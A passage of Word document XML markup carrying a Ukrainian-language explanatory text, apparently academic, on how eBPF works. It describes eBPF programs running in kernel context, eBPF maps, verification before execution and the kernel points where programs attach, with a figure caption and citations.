        <w:t>eBPF-програма</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r w:rsidR="00BC794C" w:rsidRPr="00BC794C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">це невеликий код, який </w:t>
      </w:r>
      <w:r w:rsidR="003560E6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>виконується в контексті ядра. Це</w:t>
      </w:r>
      <w:r w:rsidR="00BC794C" w:rsidRPr="00BC794C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003560E6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>ПЗ</w:t>
      </w:r>
      <w:r w:rsidR="003560E6" w:rsidRPr="00BC794C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BC794C" w:rsidRPr="00BC794C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>мож</w:t>
      </w:r>
      <w:r w:rsidR="003560E6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>е бути написаний</w:t>
      </w:r>
      <w:r w:rsidR="00BC794C" w:rsidRPr="00BC794C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> на спеціальному підмножині мови C або асемблері для виконання обмежених задач, таких як фільтрація мережевих пакетів, обробка системних викликів чи моніторинг стану процесів.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BC794C" w:rsidRDefault="007372C7" w:rsidP="00BC794C">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eBPF-карти</w:t>
      </w:r>
      <w:r w:rsidR="00BC794C" w:rsidRPr="00BC794C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> (maps)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r w:rsidR="00BC794C" w:rsidRPr="00BC794C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">це структури даних, які зберігають значення, до яких мають доступ eBPF-програми. Вони дозволяють </w:t>
      </w:r>
      <w:r w:rsidR="003560E6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>ПЗ</w:t>
      </w:r>
      <w:r w:rsidR="00BC794C" w:rsidRPr="00BC794C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> зберігати стани між різними викликами або обробкою подій.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003F3C0B" w:rsidRDefault="003F3C0B" w:rsidP="003F3C0B">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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4600575" cy="242562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09326" cy="2430238"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="003F3C0B" w:rsidRDefault="003F45FE" w:rsidP="003F3C0B">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Рис</w:t>
      </w:r>
      <w:r w:rsidR="007F018F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>унок</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>.1.</w:t>
      </w:r>
      <w:r w:rsidRPr="003F45FE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>1. –</w:t>
      </w:r>
      <w:r w:rsidR="003F3C0B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> Основа</w:t>
      </w:r>
      <w:r w:rsidR="003F3C0B" w:rsidRPr="00BC794C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> роботи eBPF </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003F3C0B" w:rsidRPr="00BC794C" w:rsidRDefault="003F3C0B" w:rsidP="003F3C0B">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p>
    <w:p w:rsidR="00BC794C" w:rsidRPr="00BC794C" w:rsidRDefault="003F45FE" w:rsidP="00BC794C">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3F45FE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="00BC794C" w:rsidRPr="00BC794C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Ключова ідея eBPF полягає в тому, що </w:t>
      </w:r>
      <w:r w:rsidR="003560E6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>ПЗ</w:t>
      </w:r>
      <w:r w:rsidR="003560E6" w:rsidRPr="00BC794C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BC794C" w:rsidRPr="00BC794C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>мож</w:t>
      </w:r>
      <w:r w:rsidR="003560E6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>е бути завантаженим</w:t>
      </w:r>
      <w:r w:rsidR="00BC794C" w:rsidRPr="00BC794C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> в ядро, але при цьому не змінюють його код. Замість цього, eBPF-програми виконуються в спеціальних контекстах (наприклад, при системних викликах, обробці мережевих пакетів, втратах або виключеннях), що дозволяє ядру інтегрувати додаткові функції без необхідності переписувати ядро або перезавантажувати систему</w:t>
      </w:r>
      <w:r w:rsidRPr="003F45FE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>”, - [2]</w:t>
      </w:r>
      <w:r w:rsidR="00BC794C" w:rsidRPr="00BC794C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236344" w:rsidRDefault="00BC794C" w:rsidP="00BC794C">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BC794C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>eBPF-програма компілюється і завантажується в ядро, зазвичай через системні</w:t>
      </w:r>
      <w:r w:rsidR="00236344">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00BC794C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> виклики </w:t>
      </w:r>
      <w:r w:rsidR="00236344">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BC794C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>або</w:t>
      </w:r>
      <w:r w:rsidR="00236344">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BC794C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> інтерфейси </w:t>
      </w:r>
      <w:r w:rsidR="00236344">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BC794C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">ядра. </w:t>
      </w:r>
      <w:r w:rsidR="00236344">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BC794C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Вона </w:t>
      </w:r>
      <w:r w:rsidR="00236344">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BC794C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">перевіряється </w:t>
      </w:r>
      <w:r w:rsidR="00236344">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BC794C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">на </w:t>
      </w:r>
      <w:r w:rsidR="00236344">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BC794C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>безпеку та</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BC794C" w:rsidRPr="00BC794C" w:rsidRDefault="00BC794C" w:rsidP="00236344">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC794C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>відповідність політикам перед виконанням.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BC794C" w:rsidRPr="00BC794C" w:rsidRDefault="003F45FE" w:rsidP="00BC794C">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3F45FE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="00BC794C" w:rsidRPr="00BC794C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Програма може виконуватися у різних точках ядра, таких як обробка мережевих пакетів, моніторинг файлової системи, або під час виконання системних викликів. При цьому програма працює з даними, що передаються в її контекст, і може змінювати поведінку або записувати інформацію в eBPF-карти</w:t>
      </w:r>
      <w:r w:rsidRPr="003F45FE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>”, - [2]</w:t>
      </w:r>
      <w:r w:rsidR="00BC794C" w:rsidRPr="00BC794C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BC794C" w:rsidRPr="00BC794C" w:rsidRDefault="003560E6" w:rsidP="00BC794C">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ПЗ</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC794C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BC794C" w:rsidRPr="00BC794C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>мож</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidR="00BC794C" w:rsidRPr="00BC794C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> взаємодіяти з іншими частинами системи через спеціальні інтерфейси, наприклад, записувати статистику або змінювати поведінку процесів. Карти eBPF дозволяють зберігати та передавати інформацію між програмами або ядром.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BC794C" w:rsidRPr="00BC794C" w:rsidRDefault="007F018F" w:rsidP="00BC794C">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7F018F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="00BC794C" w:rsidRPr="00BC794C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">eBPF підтримує різні типи </w:t>
      </w:r>
      <w:r w:rsidR="003560E6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>ПЗ</w:t>
      </w:r>
      <w:r w:rsidR="00BC794C" w:rsidRPr="00BC794C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>, які виконуються в різних контекстах</w:t>
      </w:r>
      <w:r w:rsidRPr="007F018F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>”, - [2]</w:t>
      </w:r>
      <w:r w:rsidR="00BC794C" w:rsidRPr="00BC794C">
        <w:rPr>
